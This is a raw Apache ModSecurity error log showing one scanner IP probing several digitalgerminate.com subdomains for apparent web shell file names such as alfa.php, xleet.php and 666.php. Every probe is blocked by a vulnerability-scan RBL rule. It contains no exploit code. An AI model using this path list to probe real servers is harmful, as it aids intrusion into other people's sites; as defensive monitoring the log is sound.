[Tue May 26 19:37:38.590665 2026] [security2:error] [pid 70836:tid 70925] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/404.php"] [unique_id "ahWpKu_FvbQ_BhqVMRVvQQAAkVg"]
[Tue May 26 19:37:38.659113 2026] [security2:error] [pid 70836:tid 71011] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpKu_FvbQ_BhqVMRVvJAAAALI"]
[Tue May 26 19:37:38.665807 2026] [security2:error] [pid 70836:tid 70926] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/wk/index.php"] [unique_id "ahWpKu_FvbQ_BhqVMRVvQwAA11k"]
[Tue May 26 19:37:38.678108 2026] [security2:error] [pid 70836:tid 70953] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/404.php"] [unique_id "ahWpKu_FvbQ_BhqVMRVvRQAA9HQ"]
[Tue May 26 19:37:38.686137 2026] [security2:error] [pid 70836:tid 70927] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/wk/index.php"] [unique_id "ahWpKu_FvbQ_BhqVMRVvSAAA-lo"]
[Tue May 26 19:37:38.747423 2026] [security2:error] [pid 70836:tid 70935] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/about.php"] [unique_id "ahWpKu_FvbQ_BhqVMRVvTAAA3WI"]
[Tue May 26 19:37:38.822479 2026] [security2:error] [pid 70836:tid 70936] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/term.php"] [unique_id "ahWpKu_FvbQ_BhqVMRVvTgAAmWM"]
[Tue May 26 19:37:38.822908 2026] [security2:error] [pid 70836:tid 70936] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/wk/index.php"] [unique_id "ahWpKu_FvbQ_BhqVMRVvTwAA3mM"]
[Tue May 26 19:37:38.832689 2026] [security2:error] [pid 70836:tid 70940] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/about.php"] [unique_id "ahWpKu_FvbQ_BhqVMRVvUAAA0mc"]
[Tue May 26 19:37:38.897479 2026] [security2:error] [pid 70836:tid 70944] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/ioxi-o.php"] [unique_id "ahWpKu_FvbQ_BhqVMRVvUQAAyGs"]
[Tue May 26 19:37:38.898382 2026] [security2:error] [pid 70836:tid 70945] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/about.php"] [unique_id "ahWpKu_FvbQ_BhqVMRVvUgAApGw"]
[Tue May 26 19:37:39.012695 2026] [security2:error] [pid 70836:tid 70955] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/term.php"] [unique_id "ahWpK-_FvbQ_BhqVMRVvVgAAqXY"]
[Tue May 26 19:37:39.014719 2026] [security2:error] [pid 70836:tid 70958] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/term.php"] [unique_id "ahWpK-_FvbQ_BhqVMRVvWAAAs3k"]
[Tue May 26 19:37:39.014881 2026] [security2:error] [pid 70836:tid 70929] [remote 20.151.117.104:0] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "cpanel.digitalgerminate.com"] [uri "/1.php"] [unique_id "ahWpK-_FvbQ_BhqVMRVvWQAAy1w"]
[Tue May 26 19:37:39.014967 2026] [security2:error] [pid 70836:tid 70929] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/1.php"] [unique_id "ahWpK-_FvbQ_BhqVMRVvWQAAy1w"]
[Tue May 26 19:37:39.100170 2026] [security2:error] [pid 70836:tid 70839] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/alfa.php"] [unique_id "ahWpK-_FvbQ_BhqVMRVvYQAA7gI"]
[Tue May 26 19:37:39.108476 2026] [security2:error] [pid 70836:tid 70837] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/ioxi-o.php"] [unique_id "ahWpK-_FvbQ_BhqVMRVvYgAAngA"]
[Tue May 26 19:37:39.111909 2026] [security2:error] [pid 70836:tid 70946] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/ioxi-o.php"] [unique_id "ahWpK-_FvbQ_BhqVMRVvYwAAvW0"]
[Tue May 26 19:37:39.175986 2026] [security2:error] [pid 70836:tid 70949] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/edit.php"] [unique_id "ahWpK-_FvbQ_BhqVMRVvZAAA33A"]
[Tue May 26 19:37:39.218315 2026] [security2:error] [pid 70836:tid 70948] [remote 20.151.117.104:0] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/1.php"] [unique_id "ahWpK-_FvbQ_BhqVMRVvZQAAuG8"]
[Tue May 26 19:37:39.218415 2026] [security2:error] [pid 70836:tid 70948] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/1.php"] [unique_id "ahWpK-_FvbQ_BhqVMRVvZQAAuG8"]
[Tue May 26 19:37:39.224616 2026] [security2:error] [pid 70836:tid 70947] [remote 20.151.117.104:0] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "webdisk.digitalgerminate.com"] [uri "/1.php"] [unique_id "ahWpK-_FvbQ_BhqVMRVvZgAAxW4"]
[Tue May 26 19:37:39.224694 2026] [security2:error] [pid 70836:tid 70947] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/1.php"] [unique_id "ahWpK-_FvbQ_BhqVMRVvZgAAxW4"]
[Tue May 26 19:37:39.251357 2026] [security2:error] [pid 70836:tid 70838] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/elp.php"] [unique_id "ahWpK-_FvbQ_BhqVMRVvaQABAAE"]
[Tue May 26 19:37:39.295458 2026] [security2:error] [pid 70836:tid 70950] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/alfa.php"] [unique_id "ahWpK-_FvbQ_BhqVMRVvawAA8XE"]
[Tue May 26 19:37:39.331660 2026] [security2:error] [pid 70836:tid 70951] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/alfa.php"] [unique_id "ahWpK-_FvbQ_BhqVMRVvbAAAynI"]
[Tue May 26 19:37:39.369059 2026] [security2:error] [pid 70836:tid 70952] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/classwithtostring.php"] [unique_id "ahWpK-_FvbQ_BhqVMRVvbQABBHM"]
[Tue May 26 19:37:39.372877 2026] [security2:error] [pid 70836:tid 70954] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/edit.php"] [unique_id "ahWpK-_FvbQ_BhqVMRVvbgAA-HU"]
[Tue May 26 19:37:39.465391 2026] [security2:error] [pid 70836:tid 70841] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/edit.php"] [unique_id "ahWpK-_FvbQ_BhqVMRVvbwAA5QQ"]
[Tue May 26 19:37:39.475208 2026] [security2:error] [pid 70836:tid 70845] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/666.php"] [unique_id "ahWpK-_FvbQ_BhqVMRVvcwAAkgg"]
[Tue May 26 19:37:39.476423 2026] [security2:error] [pid 70836:tid 70843] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/elp.php"] [unique_id "ahWpK-_FvbQ_BhqVMRVvdAAA7wY"]
[Tue May 26 19:37:39.585741 2026] [security2:error] [pid 70836:tid 70844] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/classwithtostring.php"] [unique_id "ahWpK-_FvbQ_BhqVMRVveQAAlQc"]
[Tue May 26 19:37:39.590090 2026] [security2:error] [pid 70836:tid 70846] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/elp.php"] [unique_id "ahWpK-_FvbQ_BhqVMRVvegAA9Qk"]
[Tue May 26 19:37:39.695082 2026] [security2:error] [pid 70836:tid 70847] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/666.php"] [unique_id "ahWpK-_FvbQ_BhqVMRVvfAAA8wo"]
[Tue May 26 19:37:39.695201 2026] [security2:error] [pid 70836:tid 70848] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/classwithtostring.php"] [unique_id "ahWpK-_FvbQ_BhqVMRVvfQAA6ws"]
[Tue May 26 19:37:39.813868 2026] [proxy:error] [pid 70836:tid 70849] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:37:39.813949 2026] [proxy_http:error] [pid 70836:tid 70849] [remote 20.151.117.104:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:37:39.814558 2026] [proxy:error] [pid 70836:tid 70849] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:37:39.814592 2026] [proxy_http:error] [pid 70836:tid 70849] [remote 20.151.117.104:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:37:39.816408 2026] [security2:error] [pid 70836:tid 70850] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/666.php"] [unique_id "ahWpK-_FvbQ_BhqVMRVvgAAAug0"]
[Tue May 26 19:37:39.891637 2026] [security2:error] [pid 70836:tid 70853] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/ws54.php"] [unique_id "ahWpK-_FvbQ_BhqVMRVvhwAAmxA"]
[Tue May 26 19:37:39.968306 2026] [security2:error] [pid 70836:tid 70852] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/deepseek_d.php"] [unique_id "ahWpK-_FvbQ_BhqVMRVvigAA3Q8"]
[Tue May 26 19:37:39.978173 2026] [security2:error] [pid 70836:tid 70855] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/ws54.php"] [unique_id "ahWpK-_FvbQ_BhqVMRVvjAABAhI"]
[Tue May 26 19:37:40.069284 2026] [security2:error] [pid 70836:tid 70856] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/function/function.php"] [unique_id "ahWpLO_FvbQ_BhqVMRVvkAAAuxM"]
[Tue May 26 19:37:40.089881 2026] [security2:error] [pid 70836:tid 70860] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/deepseek_d.php"] [unique_id "ahWpLO_FvbQ_BhqVMRVvkQAA_Rc"]
[Tue May 26 19:37:40.099698 2026] [security2:error] [pid 70836:tid 70857] [remote 51.195.183.226:43656] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "panda-eco.com"] [uri "/robots.txt"] [unique_id "ahWpLO_FvbQ_BhqVMRVvkgAAjhQ"]
[Tue May 26 19:37:40.099925 2026] [security2:error] [pid 70836:tid 70975] [client 51.195.183.226:43656] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "panda-eco.com"] [uri "/robots.txt"] [unique_id "ahWpLO_FvbQ_BhqVMRVvkgAAjhQ"]
[Tue May 26 19:37:40.168952 2026] [security2:error] [pid 70836:tid 70859] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/nw.php"] [unique_id "ahWpLO_FvbQ_BhqVMRVvkwAAvxY"]
[Tue May 26 19:37:40.187782 2026] [security2:error] [pid 70836:tid 70858] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/function/function.php"] [unique_id "ahWpLO_FvbQ_BhqVMRVvlQAArxU"]
[Tue May 26 19:37:40.224052 2026] [security2:error] [pid 70836:tid 70862] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/ws54.php"] [unique_id "ahWpLO_FvbQ_BhqVMRVvmAAA3hk"]
[Tue May 26 19:37:40.279197 2026] [security2:error] [pid 70836:tid 70869] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/nw.php"] [unique_id "ahWpLO_FvbQ_BhqVMRVvnAAA2yA"]
[Tue May 26 19:37:40.283221 2026] [security2:error] [pid 70836:tid 70868] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/xleet.php"] [unique_id "ahWpLO_FvbQ_BhqVMRVvnQAA_B8"]
[Tue May 26 19:37:40.349679 2026] [security2:error] [pid 70836:tid 70861] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/deepseek_d.php"] [unique_id "ahWpLO_FvbQ_BhqVMRVvngAAyBg"]
[Tue May 26 19:37:40.395609 2026] [security2:error] [pid 70836:tid 70863] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/wp.php"] [unique_id "ahWpLO_FvbQ_BhqVMRVvnwAA6Bo"]
[Tue May 26 19:37:40.402100 2026] [security2:error] [pid 70836:tid 70870] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/xleet.php"] [unique_id "ahWpLO_FvbQ_BhqVMRVvoAAAtSE"]
[Tue May 26 19:37:40.425602 2026] [security2:error] [pid 70836:tid 70864] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/function/function.php"] [unique_id "ahWpLO_FvbQ_BhqVMRVvoQAAsRs"]
[Tue May 26 19:37:40.477471 2026] [security2:error] [pid 70836:tid 70867] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/wp.php"] [unique_id "ahWpLO_FvbQ_BhqVMRVvogAA2R4"]
[Tue May 26 19:37:40.514481 2026] [security2:error] [pid 70836:tid 70866] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/nw.php"] [unique_id "ahWpLO_FvbQ_BhqVMRVvpwAAoh0"]
[Tue May 26 19:37:40.520347 2026] [security2:error] [pid 70836:tid 70875] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/155.php"] [unique_id "ahWpLO_FvbQ_BhqVMRVvqQAAliY"]
[Tue May 26 19:37:40.589054 2026] [security2:error] [pid 70836:tid 70878] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/xleet.php"] [unique_id "ahWpLO_FvbQ_BhqVMRVvsAAAyik"]
